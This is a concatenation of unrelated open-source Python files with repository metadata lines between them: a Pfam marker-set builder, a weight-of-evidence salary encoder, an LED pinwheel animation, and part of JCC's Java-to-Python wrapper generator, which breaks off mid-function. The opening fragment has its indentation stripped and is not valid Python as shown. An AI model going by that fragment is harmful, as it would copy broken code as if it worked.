fout.write('COLOCATED_GENOME_PERCENTAGE\t' + str(colocatedGenomeThreshold) + '\n')
# change model names to accession numbers, and make
# sure there is an HMM model for each PFAM
mungedColocatedSets = []
setSizes = []
for geneSet in colocatedSets:
s = set()
for geneId in geneSet:
if 'pfam' in geneId:
pfamId = geneId.replace('pfam', 'PF')
if pfamId in pfamIdToPfamAcc:
s.add(pfamIdToPfamAcc[pfamId])
else:
s.add(geneId)
setSizes.append(len(s))
mungedColocatedSets.append(s)
fout.write(str(mungedColocatedSets))
fout.close()
# write out single taxonomic-specific marker set file
numMarkerGenes = 0
for m in mungedColocatedSets:
numMarkerGenes += len(m)
taxon = taxonomy[-1]
if len(taxonomy) == 7:
taxon = taxonomy[5] + ' ' + taxonomy[6]
maxSetSize = max(setSizes)
avgSetSize = float(sum(setSizes))/len(setSizes)
taxonSetOut.write(ranksByLevel[len(taxonomy)-1] + '\t' + taxon + '\t' + lineage + '\t' + str(numGenomes) + '\t' + str(numMarkerGenes) + '\t' + str(len(mungedColocatedSets)) + '\t' + str(maxSetSize) + '\t' + str(avgSetSize) + '\t' + str(mungedColocatedSets) + '\n')
sys.stdout.write('\n')
taxonSetOut.close()
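    # Map Pfam model ids (e.g., PF00001) to versioned accessions
    # (e.g., PF00001.21) by scanning the ACC lines of the Pfam-A HMM file.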
def __pfamIdToPfamAcc(self, img):
pfamIdToPfamAcc = {}
for line in open('/srv/whitlam/bio/db/pfam/27/Pfam-A.hmm'):
if 'ACC' in line:
acc = line.split()[1].strip()
pfamId = acc.split('.')[0]
pfamIdToPfamAcc[pfamId] = acc
return pfamIdToPfamAcc
def run(self, outputDir, ubiquityThreshold, singleCopyThreshold, minGenomes, colocatedDistThreshold, colocatedGenomeThreshold, threads):
if not os.path.exists(outputDir):
os.makedirs(outputDir)
# determine lineages to process
img = IMG('/srv/whitlam/bio/db/checkm/img/img_metadata.tsv', '/srv/whitlam/bio/db/checkm/pfam/tigrfam2pfam.tsv')
metadata = img.genomeMetadata()
lineages = img.lineagesSorted(metadata)
lineages.append('Universal')
# determine HMM model accession numbers
pfamIdToPfamAcc = self.__pfamIdToPfamAcc(img)
# populate worker queue with data to process
workerQueue = mp.Queue()
writerQueue = mp.Queue()
for lineage in lineages:
workerQueue.put(lineage)
for _ in range(threads):
workerQueue.put(None)
workerProc = [mp.Process(target = self.__workerThread, args = (ubiquityThreshold, singleCopyThreshold,
minGenomes,
colocatedDistThreshold, colocatedGenomeThreshold,
metadata,
workerQueue, writerQueue)) for _ in range(threads)]
writeProc = mp.Process(target = self.__writerThread, args = (pfamIdToPfamAcc,
ubiquityThreshold, singleCopyThreshold,
colocatedDistThreshold, colocatedGenomeThreshold,
outputDir, len(lineages), writerQueue))
writeProc.start()
for p in workerProc:
p.start()
for p in workerProc:
p.join()
writerQueue.put((None, None, None))
writeProc.join()
if __name__ == '__main__':
print __prog_name__ + ' v' + __version__ + ': ' + __prog_desc__
print ' by ' + __author__ + ' (' + __email__ + ')' + '\n'
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('output_dir', help='output directory')
parser.add_argument('-u', '--ubiquity', help='ubiquity threshold for defining marker set', type=float, default = 0.97)
parser.add_argument('-s', '--single_copy', help='single-copy threshold for defining marker set', type=float, default = 0.97)
parser.add_argument('-m', '--min_genomes', help='minimum genomes required to infer marker set', type=int, default = 2)
parser.add_argument('-d', '--distance_threshold', help='genomic distance to be considered co-located', type=float, default=5000)
parser.add_argument('-g', '--genome_threshold', help='percentage of genomes required to be considered co-located', type=float, default=0.95)
parser.add_argument('-t', '--threads', type=int, help='number of threads', default=1)
args = parser.parse_args()
try:
taxonomicMarkerSets = TaxonomicMarkerSets()
        taxonomicMarkerSets.run(args.output_dir, args.ubiquity, args.single_copy, args.min_genomes, args.distance_threshold, args.genome_threshold, args.threads)
except SystemExit:
print "\nControlled exit resulting from an unrecoverable error or warning."
except:
print "\nUnexpected error:", sys.exc_info()[0]
raise
| gpl-3.0 | 5,907,076,798,651,764,000 | 47.413636 | 280 | 0.527181 | false | 4.219889 | false | false | false |
ScoffM/ITESO-Word2Vec | Salaries_Woeization.py | 1 | 3115 | import pandas as pd
import numpy as np
import math
import time
#Replace the nan values with the string True_nan in a dataframe's column
def eliminate_nan(col):
trueNan = pd.isnull(col)
    indexs = trueNan[trueNan].index.tolist()
col[indexs] = 'True_nan'
return col
#colnames is a list of names of the columns to be transformed
#Should either:
# a) Be ["ContractType", "ContractTime", "Category", "SourceName"]
# b) Pass data with only the above columns and use colnames.values
# The NaN's might have to be transformed before woeization can be completed.
#This function returns a dataframe with woe values just with the specified columns
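# For a category c of a column, the weight of evidence computed below is
#   WoE(c) = ln( (n_high(c) / n_high_total) / (n_low(c) / n_low_total) )
# where "high" means target_variable >= the (floored) median of target_variable.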
def woeization(data, target_variable, colnames):
my_median = math.floor(data[target_variable].median())
true_all = sum(data[target_variable] >= my_median)
false_all = sum(data[target_variable] < my_median)
for x in range(len(colnames)):
#If the column has any nan value, the nan function is applies
if data[colnames[x]].isnull().values.any() == True:
data[colnames[x]] = eliminate_nan(data[colnames[x]])
xx = data[colnames[x]] # In each loop, set xx for an entire column
my_cat = np.unique(xx).tolist() # List of unique categories on my column xx
for y in range(len(my_cat)):
true = sum((xx == my_cat[y]) & (data[target_variable] >= my_median))
false = sum((xx == my_cat[y]) & (data[target_variable] < my_median))
# If the data is completely skewed towards a "side"
# Make it slightly larger than 0 to get out of the undefined zones of log(x) and 1/x
if true == 0:
true = 0.001
if false == 0:
false = 0.001
            # Calculate WoE
true_per = float(true) / true_all
false_per = float(false) / false_all
div = float(true_per) / false_per
woe = math.log(div)
data.loc[data[colnames[x]] == my_cat[y], colnames[x]] = woe
data = data[(colnames + [target_variable])]
return data
# Run as standalone to get a modified dataframe, else import to get the modified features
def main():
global_start = time.time()
path = "data/Train_Rev1.csv"
target_variable = "SalaryNormalized"
colnames = ['ContractType', 'ContractTime', 'Category', 'SourceName']
def identity(x):
return x
# This allegedly increases speed in loading as it tells pandas to load thos oclumns as strings
converters = { "FullDescription" : identity
, "Title": identity
, "LocationRaw": identity
, "LocationNormalized": identity
}
print "Loading Data..."
    data = pd.read_csv(path, converters=converters)
print "Done!"
print "Initializing Data Transformation"
data_woe= woeization(data=data, target_variable=target_variable, colnames=colnames)
data_woe.to_csv('data/WoE_Features.csv')
if __name__=="__main__":
main()
| gpl-3.0 | 3,483,683,236,759,404,000 | 39.533333 | 98 | 0.609952 | false | 3.721625 | false | false | false |
rec/BiblioPixelAnimations | BiblioPixelAnimations/matrix/pinwheel.py | 2 | 1351 | from bibliopixel.animation.matrix import Matrix
class Pinwheel(Matrix):
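    """Draw lines from the matrix center to every perimeter pixel, mapping
    palette position onto perimeter position so the colors appear to spin;
    ``dir`` flips the direction of rotation."""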
def __init__(self, layout, dir=True, **kwds):
super().__init__(layout, **kwds)
self._center = (self.width // 2, self.height // 2)
self._dir = dir
self._len = (self.width * 2) + (self.height * 2) - 2
def pre_run(self):
self._step = 0
def step(self, amt):
if self._dir:
s = 255 - self._step
else:
s = self._step
pos = 0
cX, cY = self._center
for x in range(self.width):
index = pos * 255 / self._len + s
self.layout.drawLine(cX, cY, x, 0, self.palette(index))
pos += 1
for y in range(self.height):
color = self.palette(pos * 255 / self._len + s)
self.layout.drawLine(cX, cY, self.width - 1, y, color)
pos += 1
for x in range(self.width - 1, -1, -1):
color = self.palette(pos * 255 / self._len + s)
self.layout.drawLine(cX, cY, x, self.height - 1, color)
pos += 1
for y in range(self.height - 1, -1, -1):
color = self.palette(pos * 255 / self._len + s)
self.layout.drawLine(cX, cY, 0, y, color)
pos += 1
self._step += amt
        if self._step >= 255:
self._step = 0
| mit | 3,571,952,326,134,889,000 | 29.022222 | 67 | 0.487047 | false | 3.385965 | false | false | false |
adamdoupe/enemy-of-the-state | jcc/jcc/python.py | 2 | 57348 | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os, sys, platform, shutil, _jcc, py_compile
from cpp import PRIMITIVES, INDENT, HALF_INDENT
from cpp import cppname, cppnames, typename
from cpp import line, signature, find_method, split_pkg, sort
from cpp import Modifier
from _jcc import findClass
from config import INCLUDES, CFLAGS, DEBUG_CFLAGS, LFLAGS, SHARED
python_ver = '%d.%d.%d' %(sys.version_info[0:3])
if python_ver < '2.4':
from sets import Set as set
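# C++ return statements that convert a Java value to a Python object,
# keyed by Java type name; types not listed here are handled in returnValue().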
RESULTS = { 'boolean': 'Py_RETURN_BOOL(%s);',
'byte': 'return PyString_FromStringAndSize((char *) &%s, 1);',
'char': 'return PyUnicode_FromUnicode((Py_UNICODE *) &%s, 1);',
'double': 'return PyFloat_FromDouble((double) %s);',
'float': 'return PyFloat_FromDouble((double) %s);',
'int': 'return PyInt_FromLong((long) %s);',
'long': 'return PyLong_FromLongLong((PY_LONG_LONG) %s);',
'short': 'return PyInt_FromLong((long) %s);',
'java.lang.String': 'return j2p(%s);' }
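# (format char, conversion expression, needs-DECREF) triples used when
# passing a Java value into PyObject_CallMethod, keyed by Java type name.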
CALLARGS = { 'boolean': ('O', '(%s ? Py_True : Py_False)', False),
'byte': ('O', 'PyString_FromStringAndSize((char *) &%s, 1)', True),
'char': ('O', 'PyUnicode_FromUnicode((Py_UNICODE *) &%s, 1)', True),
'double': ('d', '(double) %s', False),
'float': ('f', '(float) %s', False),
'int': ('i', '(int) %s', False),
'long': ('L', '(long long) %s', False),
'short': ('i', '(int) %s', False),
'java.lang.String': ('O', 'env->fromJString((jstring) %s)', True) }
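# Build the (signature, extra class-check args, call args) strings consumed
# by the generated C++ parseArg()/parseArgs() calls for a Java parameter list.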
def parseArgs(params, current):
def signature(cls):
array = ''
while cls.isArray():
array += '['
cls = cls.getComponentType()
clsName = cls.getName()
if cls.isPrimitive():
return array + PRIMITIVES[clsName]
if clsName == 'java.lang.String':
return array + 's'
if clsName == 'java.lang.Object':
return array + 'o'
return array + 'k'
def checkarg(cls):
while cls.isArray():
cls = cls.getComponentType()
if (cls.isPrimitive() or
cls.getName() in ('java.lang.String', 'java.lang.Object')):
return ''
return ', %s::initializeClass' %(typename(cls, current, False))
def callarg(cls, i):
return ', &a%d' %(i)
return (''.join([signature(param) for param in params]),
''.join([checkarg(param) for param in params]),
''.join([callarg(params[i], i) for i in xrange(len(params))]))
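# Emit the C++ body of a wrapped constructor: declare typed locals, parse
# the Python arguments into them and invoke the proxy constructor.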
def construct(out, indent, cls, inCase, constructor, names):
if inCase:
line(out, indent, '{')
indent += 1
params = constructor.getParameterTypes()
count = len(params)
for i in xrange(count):
line(out, indent, '%s a%d%s;',
typename(params[i], cls, False), i,
not params[i].isPrimitive() and '((jobject) NULL)' or '')
line(out, indent, '%s object((jobject) NULL);', cppname(names[-1]))
line(out)
if count:
line(out, indent, 'if (!parseArgs(args, "%s"%s%s))',
*parseArgs(params, cls))
line(out, indent, '{')
indent += 1
line(out, indent, 'INT_CALL(object = %s(%s));',
cppname(names[-1]), ', '.join(['a%d' %(i) for i in xrange(count)]))
line(out, indent, 'self->object = object;')
if inCase:
line(out, indent, 'break;')
if count:
indent -= 1
line(out, indent, '}')
if inCase:
indent -= 1
line(out, indent, '}')
def rpartition(string, sep):
if python_ver >= '2.5.0':
return string.rpartition(sep)
else:
parts = split_pkg(string, sep)
if len(parts) == 1:
return ('', '', parts[0])
return (parts[0], sep, parts[1])
def fieldValue(cls, value, fieldType):
if fieldType.isArray():
fieldType = fieldType.getComponentType()
if fieldType.isArray():
result = 'JArray<jobject>(%s->this$).wrap(NULL)'
elif fieldType.isPrimitive():
result = '%s->wrap()'
elif fieldType.getName() == 'java.lang.String':
result = 'JArray<jstring>(%s->this$).wrap()'
else:
parts = rpartition(typename(fieldType, cls, False), '::')
result = 'JArray<jobject>(%%s->this$).wrap(%s%st_%s::wrap_jobject)' %(parts)
elif fieldType.getName() == 'java.lang.String':
result = 'j2p(*%s)'
elif not fieldType.isPrimitive():
parts = rpartition(typename(fieldType, cls, False), '::')
result = '%s%st_%s::wrap_Object(*%%s)' %(parts)
else:
return value
return result %(value)
def returnValue(cls, returnType, value):
result = RESULTS.get(returnType.getName())
if not result:
if returnType.isArray():
returnType = returnType.getComponentType()
depth = 1
while returnType.isArray():
returnType = returnType.getComponentType()
depth += 1
if depth > 1:
result = 'return JArray<jobject>(%s.this$).wrap(NULL);'
elif returnType.isPrimitive():
result = 'return %s.wrap();'
elif returnType.getName() == 'java.lang.String':
result = 'return JArray<jstring>(%s.this$).wrap();'
else:
returnName = typename(returnType, cls, False)
parts = rpartition(returnName, '::')
result = 'return JArray<jobject>(%%s.this$).wrap(%s%st_%s::wrap_jobject);' %(parts)
else:
returnName = typename(returnType, cls, False)
parts = rpartition(returnName, '::')
result = 'return %s%st_%s::wrap_Object(%%s);' %(parts)
return result %(value)
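# Emit the C++ body dispatching one Java method overload: parse the Python
# arguments, make the (static or instance) call and wrap the return value.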
def call(out, indent, cls, inCase, method, names, cardinality, isExtension):
if inCase:
line(out, indent, '{')
indent += 1
name = method.getName()
modifiers = method.getModifiers()
params = method.getParameterTypes()
returnType = method.getReturnType()
count = len(params)
for i in xrange(count):
line(out, indent, '%s a%d%s;',
typename(params[i], cls, False), i,
not params[i].isPrimitive() and '((jobject) NULL)' or '')
returnName = returnType.getName()
if returnName != 'void':
line(out, indent, '%s result%s;',
typename(returnType, cls, False),
not returnType.isPrimitive() and '((jobject) NULL)' or '')
result = 'result = '
else:
result = ''
if cardinality and (count or not inCase):
s = cardinality > 1 and 's' or ''
line(out)
if isExtension and name == 'clone' and Modifier.isNative(modifiers):
line(out, indent, 'if (arg)')
else:
line(out, indent, 'if (!parseArg%s(arg%s, "%s"%s%s))',
s, s, *parseArgs(params, cls))
line(out, indent, '{')
indent += 1
name = cppname(name)
if Modifier.isStatic(modifiers):
line(out, indent, 'OBJ_CALL(%s%s::%s(%s));',
result, '::'.join(cppnames(names)), name,
', '.join(['a%d' %(i) for i in xrange(count)]))
else:
line(out, indent, 'OBJ_CALL(%sself->object.%s(%s));',
result, name, ', '.join(['a%d' %(i) for i in xrange(count)]))
if isExtension and name == 'clone' and Modifier.isNative(modifiers):
line(out)
line(out, indent, '%s object(result.this$);', typename(cls, cls, False))
line(out, indent, 'if (PyObject_TypeCheck(arg, &FinalizerProxy$$Type) &&')
line(out, indent, ' PyObject_TypeCheck(((t_fp *) arg)->object, self->ob_type))')
line(out, indent, '{')
line(out, indent + 1, 'PyObject *_arg = ((t_fp *) arg)->object;')
line(out, indent + 1, '((t_JObject *) _arg)->object = object;')
line(out, indent + 1, 'Py_INCREF(_arg);')
line(out, indent + 1, 'object.pythonExtension((jlong) (Py_intptr_t) (void *) _arg);')
line(out, indent + 1, 'Py_INCREF(arg);')
line(out, indent + 1, 'return arg;')
line(out, indent, '}')
line(out, indent, 'return PyErr_SetArgsError("%s", arg);' %(name))
elif returnName != 'void':
line(out, indent, returnValue(cls, returnType, 'result'))
else:
line(out, indent, 'Py_RETURN_NONE;')
if cardinality and (count or not inCase):
indent -= 1
line(out, indent, '}')
if inCase:
indent -= 1
line(out, indent, '}')
def methodargs(methods, superMethods):
if len(methods) == 1 and methods[0].getName() not in superMethods:
count = len(methods[0].getParameterTypes())
if count == 0:
return '', '', 0
elif count == 1:
return ', PyObject *arg', ', arg', 1
return ', PyObject *args', ', args', 2
def jniname(cls):
if cls.isPrimitive():
name = cls.getName()
if name != 'void':
name = 'j' + name
else:
name = 'jobject'
return name
def jniargs(params):
count = len(params)
decls = ', '.join(['%s a%d' %(jniname(params[i]), i)
for i in xrange(count)])
if decls:
return ', ' + decls
return ''
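# Emit the body of a JNI callback that forwards a native Java method into
# Python: recover the PyObject from the pythonExtension() pointer, call the
# method with converted arguments and convert the result back to a Java value.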
def extension(env, out, indent, cls, names, name, count, method):
line(out, indent, 'jlong ptr = jenv->CallLongMethod(jobj, %s::mids$[%s::mid_pythonExtension_%s]);',
cppname(names[-1]), cppname(names[-1]), env.strhash('()J'))
line(out, indent, 'PyObject *obj = (PyObject *) (Py_intptr_t) ptr;')
if name == 'pythonDecRef':
line(out)
line(out, indent, 'if (obj != NULL)')
line(out, indent, '{')
line(out, indent + 1, 'jenv->CallVoidMethod(jobj, %s::mids$[%s::mid_pythonExtension_%s], (jlong) 0);',
cppname(names[-1]), cppname(names[-1]), env.strhash('(J)V'))
line(out, indent + 1, 'env->finalizeObject(jenv, obj);')
line(out, indent, '}')
return
line(out, indent, 'PythonGIL gil(jenv);')
returnType = method.getReturnType()
returnName = returnType.getName()
if returnName != 'void':
line(out, indent, '%s value%s;',
typename(returnType, cls, False),
not returnType.isPrimitive() and '((jobject) NULL)' or '')
sigs = []
decrefs = []
args = []
i = 0
for param in method.getParameterTypes():
typeName = param.getName()
if typeName in CALLARGS:
sig, code, decref = CALLARGS[typeName]
elif param.isArray():
param = param.getComponentType()
if param.isPrimitive():
code = 'JArray<j%s>(%%s).wrap()' %(param.getName())
elif param.isArray():
code = 'JArray<jobject>(%s).wrap(NULL)'
elif param.getName() == 'java.lang.String':
code = 'JArray<jstring>(%s).wrap()'
else:
parts = rpartition(typename(param, cls, False), '::')
code = 'JArray<jobject>(%%s).wrap(%s%st_%s::wrap_jobject)' %(parts)
sig, decref = 'O', True
elif param.getName() == 'java.lang.String':
            sig, code, decref = 'O', 'j2p(%s)', True
else:
parts = rpartition(typename(param, cls, False), '::')
sig, code, decref = 'O', '%s%st_%s::wrap_Object(%s%s%s(%%s))' %(parts*2), True
if sig == 'O':
line(out, indent, 'PyObject *o%d = %s;', i, code %('a%d' %(i)))
args.append('o%d' %(i))
else:
args.append(code %('a%d' %(i)))
sigs.append(sig)
decrefs.append(decref)
i += 1
args = ', '.join(args)
if args:
args = ', ' + args
line(out, indent, 'PyObject *result = PyObject_CallMethod(obj, "%s", "%s"%s);',
name, ''.join(sigs), args)
i = 0
for decref in decrefs:
if decref:
line(out, indent, 'Py_DECREF(o%d);', i)
i += 1
line(out, indent, 'if (!result)')
line(out, indent + 1, 'throwPythonError();')
if returnName == 'void':
line(out, indent, 'else')
line(out, indent + 1, 'Py_DECREF(result);')
else:
signature, check, x = parseArgs([returnType], cls)
line(out, indent, 'else if (parseArg(result, "%s"%s, &value))',
signature, check)
line(out, indent, '{')
line(out, indent + 1, 'throwTypeError("%s", result);', name)
line(out, indent + 1, 'Py_DECREF(result);')
line(out, indent, '}')
line(out, indent, 'else')
line(out, indent, '{')
if not returnType.isPrimitive():
line(out, indent + 1, 'jobj = jenv->NewLocalRef(value.this$);')
line(out, indent + 1, 'Py_DECREF(result);')
if returnType.isPrimitive():
line(out, indent + 1, 'return value;')
else:
line(out, indent + 1, 'return jobj;')
line(out, indent, '}')
line(out)
if returnType.isPrimitive():
line(out, indent, 'return (j%s) 0;', returnName)
else:
line(out, indent, 'return (jobject) NULL;')
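# Generate the Python wrapper type (t_<name>) for a Java class: the header
# declaration plus the C++ definitions of its constructors, methods, fields,
# properties and protocol slots (iterator, mapping, sequence).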
def python(env, out_h, out, cls, superCls, names, superNames,
constructors, methods, protectedMethods, fields, instanceFields,
mapping, sequence, rename, declares, typeset, excludes, moduleName):
line(out_h)
line(out_h, 0, '#include <Python.h>')
line(out_h)
indent = 0
for name in names[:-1]:
line(out_h, indent, 'namespace %s {', cppname(name))
indent += 1
line(out_h, indent, 'extern PyTypeObject %s$$Type;', names[-1])
line(out_h)
line(out_h, indent, 'class t_%s {', names[-1])
line(out_h, indent, 'public:')
line(out_h, indent + 1, 'PyObject_HEAD')
line(out_h, indent + 1, '%s object;', cppname(names[-1]))
line(out_h, indent + 1, 'static PyObject *wrap_Object(const %s&);',
cppname(names[-1]))
line(out_h, indent + 1, 'static PyObject *wrap_jobject(const jobject&);')
line(out_h, indent + 1, 'static void install(PyObject *module);')
line(out_h, indent + 1, 'static void initialize(PyObject *module);')
line(out_h, indent, '};')
iterator = findClass('java/util/Iterator')
enumeration = findClass('java/util/Enumeration')
while indent:
indent -= 1
line(out_h, indent, '}')
line(out)
line(out, 0, '#include "structmember.h"')
line(out, 0, '#include "functions.h"')
line(out, 0, '#include "macros.h"')
for inner in cls.getDeclaredClasses():
if inner in typeset and not inner in declares:
if Modifier.isStatic(inner.getModifiers()):
line(out, 0, '#include "%s.h"',
inner.getName().replace('.', '/'))
for method in methods:
if method.getName() == 'pythonExtension':
isExtension = True
break
else:
isExtension = False
line(out)
indent = 0
for name in names[:-1]:
line(out, indent, 'namespace %s {', cppname(name))
indent += 1
if not isExtension:
line(out, indent, 'static PyObject *t_%s_cast_(PyTypeObject *type, PyObject *arg);', names[-1])
line(out, indent, 'static PyObject *t_%s_instance_(PyTypeObject *type, PyObject *arg);', names[-1])
if constructors:
line(out, indent, 'static int t_%s_init_(t_%s *self, PyObject *args, PyObject *kwds);', names[-1], names[-1])
constructorName = 't_%s_init_' %(names[-1])
else:
constructorName = 'abstract_init'
if superCls:
superMethods = set([method.getName()
for method in superCls.getMethods()])
else:
superMethods = ()
allMethods = {}
extMethods = {}
propMethods = {}
if methods:
for method in methods:
modifiers = method.getModifiers()
name = method.getName()
params = method.getParameterTypes()
superMethod = None
isNative = Modifier.isNative(modifiers)
isStatic = Modifier.isStatic(modifiers)
if (isExtension and not isStatic and superCls and isNative):
superMethod = find_method(superCls, name, params)
if isExtension and isNative and not isStatic:
extMethods.setdefault(name, []).append(method)
if superMethod or not (isExtension and isNative and not isStatic):
if isStatic:
if name in allMethods:
if Modifier.isStatic(allMethods[name][0].getModifiers()):
allMethods[name].append(method)
elif name + '_' in allMethods:
allMethods[name + '_'].append(method)
else:
print >>sys.stderr, " Warning: renaming static method '%s' on class %s to '%s_' since it is shadowed by non-static method of same name." %(name, '.'.join(names), name)
allMethods[name + '_'] = [method]
else:
allMethods[name] = [method]
else:
if name in allMethods:
if Modifier.isStatic(allMethods[name][0].getModifiers()):
print >>sys.stderr, " Warning: renaming static method '%s' on class %s to '%s_' since it is shadowed by non-static method of same name." %(name, '.'.join(names), name)
allMethods[name + '_'] = allMethods[name]
allMethods[name] = [method]
else:
allMethods[name].append(method)
else:
allMethods[name] = [method]
if not (isExtension and isNative):
nameLen = len(name)
paramsLen = len(params)
if nameLen > 3 and paramsLen == 0 and name.startswith('get'):
propMethods.setdefault(name[3].lower() + name[4:],
[]).append(method)
elif nameLen > 3 and paramsLen == 1 and name.startswith('set'):
propMethods.setdefault(name[3].lower() + name[4:],
[]).append(method)
elif nameLen > 2 and paramsLen == 0 and name.startswith('is'):
propMethods.setdefault(name[2].lower() + name[3:],
[]).append(method)
properties = set([name for name in propMethods.iterkeys()
if name not in allMethods])
propMethods = [(name, propMethods[name]) for name in properties]
sort(propMethods, key=lambda x: x[0])
extMethods = extMethods.items()
sort(extMethods, key=lambda x: x[0])
allMethods = allMethods.items()
sort(allMethods, key=lambda x: x[0])
iteratorMethod = None
iteratorExt = False
nextMethod = None
nextExt = False
nextElementMethod = None
nextElementExt = False
mappingMethod = None
if mapping:
mappingName, mappingSig = mapping.split(':')
sequenceLenMethod = None
sequenceGetMethod = None
if sequence:
sequenceLenName, sequenceLenSig = sequence[0].split(':')
sequenceGetName, sequenceGetSig = sequence[1].split(':')
for name, methods in allMethods:
args, x, cardinality = methodargs(methods, superMethods)
sort(methods, key=lambda x: len(x.getParameterTypes()))
method = methods[0]
modifiers = method.getModifiers()
if name == 'iterator' and iteratorMethod is None:
if (not method.getParameterTypes() and
iterator.isAssignableFrom(method.getReturnType())):
iteratorMethod = method
elif name == 'next' and nextMethod is None:
if (not method.getParameterTypes() and
not method.getReturnType().isPrimitive()):
nextMethod = method
elif name == 'nextElement' and nextElementMethod is None:
if (not method.getParameterTypes() and
not method.getReturnType().isPrimitive()):
nextElementMethod = method
elif mapping and name == mappingName and mappingMethod is None:
if signature(method) == mappingSig:
mappingMethod = (method, cardinality)
elif sequence and name == sequenceLenName and sequenceLenMethod is None:
if signature(method) == sequenceLenSig:
sequenceLenMethod = (method, cardinality)
elif sequence and name == sequenceGetName and sequenceGetMethod is None:
if signature(method) == sequenceGetSig:
sequenceGetMethod = (method, cardinality)
elif isExtension and name == 'clone' and Modifier.isNative(modifiers):
args, x, cardinality = ', PyObject *arg', ', arg', 1
if Modifier.isStatic(modifiers):
line(out, indent, 'static PyObject *t_%s_%s(PyTypeObject *type%s);',
names[-1], name, args)
else:
line(out, indent, 'static PyObject *t_%s_%s(t_%s *self%s);',
names[-1], name, names[-1], args)
for name, methods in extMethods:
args, x, cardinality = methodargs(methods, superMethods)
sort(methods, key=lambda x: len(x.getParameterTypes()))
method = methods[0]
modifiers = method.getModifiers()
if name == 'iterator' and iteratorMethod is None:
if (not method.getParameterTypes() and
iterator.isAssignableFrom(method.getReturnType())):
iteratorMethod = method
iteratorExt = True
elif name == 'next' and nextMethod is None:
if (not method.getParameterTypes() and
not method.getReturnType().isPrimitive()):
nextMethod = method
nextExt = True
elif name == 'nextElement' and nextElementMethod is None:
if (not method.getParameterTypes() and
not method.getReturnType().isPrimitive()):
nextElementMethod = method
nextElementExt = True
if isExtension:
count = 0
for name, methods in extMethods:
for method in methods:
line(out, indent,
'static %s JNICALL t_%s_%s%d(JNIEnv *jenv, jobject jobj%s);',
jniname(method.getReturnType()), names[-1], name, count,
jniargs(method.getParameterTypes()))
count += 1
line(out, indent, 'static PyObject *t_%s_get__self(t_%s *self, void *data);', names[-1], names[-1])
if instanceFields:
for field in instanceFields:
fieldName = field.getName()
if fieldName not in properties:
line(out, indent, 'static PyObject *t_%s_get__%s(t_%s *self, void *data);',
names[-1], fieldName, names[-1])
if not Modifier.isFinal(field.getModifiers()):
line(out, indent, 'static int t_%s_set__%s(t_%s *self, PyObject *arg, void *data);',
names[-1], field.getName(), names[-1])
line(out)
for fieldName, methods in propMethods:
getter = False
setter = False
for method in methods:
methodName = method.getName()
if not getter and (methodName.startswith('get') or
methodName.startswith('is')):
getter = True
line(out, indent, 'static PyObject *t_%s_get__%s(t_%s *self, void *data);',
names[-1], fieldName, names[-1])
elif not setter and methodName.startswith('set'):
setter = True
line(out, indent, 'static int t_%s_set__%s(t_%s *self, PyObject *arg, void *data);',
names[-1], fieldName, names[-1])
if instanceFields or propMethods or isExtension:
line(out, indent, 'static PyGetSetDef t_%s__fields_[] = {', names[-1])
for field in instanceFields:
fieldName = field.getName()
if fieldName not in properties:
if Modifier.isFinal(field.getModifiers()):
line(out, indent + 1, 'DECLARE_GET_FIELD(t_%s, %s),',
names[-1], fieldName)
else:
line(out, indent + 1, 'DECLARE_GETSET_FIELD(t_%s, %s),',
names[-1], fieldName)
for fieldName, methods in propMethods:
getter = False
setter = False
for method in methods:
methodName = method.getName()
if not getter and (methodName.startswith('get') or
methodName.startswith('is')):
getter = True
elif not setter and methodName.startswith('set'):
setter = True
if getter and setter:
op = 'GETSET'
elif getter:
op = 'GET'
elif setter:
op = 'SET'
line(out, indent + 1, 'DECLARE_%s_FIELD(t_%s, %s),',
op, names[-1], fieldName)
if isExtension:
line(out, indent + 1, 'DECLARE_GET_FIELD(t_%s, self),', names[-1])
line(out, indent + 1, '{ NULL, NULL, NULL, NULL, NULL }')
line(out, indent, '};')
line(out)
line(out, indent, 'static PyMethodDef t_%s__methods_[] = {', names[-1])
if not isExtension:
line(out, indent + 1,
'DECLARE_METHOD(t_%s, cast_, METH_O | METH_CLASS),', names[-1])
line(out, indent + 1,
'DECLARE_METHOD(t_%s, instance_, METH_O | METH_CLASS),', names[-1])
for name, methods in allMethods:
modifiers = methods[0].getModifiers()
if len(methods) == 1 and not name in superMethods:
count = len(methods[0].getParameterTypes())
if count == 0:
args = 'METH_NOARGS'
elif count == 1:
args = 'METH_O'
else:
args = 'METH_VARARGS'
elif isExtension and name == 'clone' and Modifier.isNative(modifiers):
args = 'METH_O'
else:
args = 'METH_VARARGS'
if Modifier.isStatic(modifiers):
args += ' | METH_CLASS'
line(out, indent + 1, 'DECLARE_METHOD(t_%s, %s, %s),',
names[-1], name, args)
line(out, indent + 1, '{ NULL, NULL, 0, NULL }')
line(out, indent, '};')
if instanceFields or propMethods or isExtension:
tp_getset = 't_%s__fields_' %(names[-1])
else:
tp_getset = '0'
if iteratorMethod:
if iteratorExt:
tp_iter = 'get_extension_iterator'
else:
tp_iter = '((PyObject *(*)(t_%s *)) get_iterator<t_%s>)' %(names[-1], names[-1])
tp_iternext = '0'
elif nextMethod and iterator.isAssignableFrom(cls):
tp_iter = 'PyObject_SelfIter'
returnName = typename(nextMethod.getReturnType(), cls, False)
ns, sep, n = rpartition(returnName, '::')
if nextExt:
tp_iternext = 'get_extension_next'
else:
tp_iternext = '((PyObject *(*)(java::util::t_Iterator *)) get_iterator_next<java::util::t_Iterator,%s%st_%s,%s>)' %(ns, sep, n, returnName)
elif nextElementMethod and enumeration.isAssignableFrom(cls):
tp_iter = 'PyObject_SelfIter'
returnName = typename(nextElementMethod.getReturnType(), cls, False)
ns, sep, n = rpartition(returnName, '::')
if nextElementExt:
tp_iternext = 'get_extension_nextElement'
else:
tp_iternext = '((PyObject *(*)(java::util::t_Enumeration *)) get_enumeration_next<java::util::t_Enumeration,%s%st_%s,%s>)' %(ns, sep, n, returnName)
elif nextMethod:
tp_iter = 'PyObject_SelfIter'
returnName = typename(nextMethod.getReturnType(), cls, False)
ns, sep, n = rpartition(returnName, '::')
if nextExt:
tp_iternext = 'get_extension_next'
else:
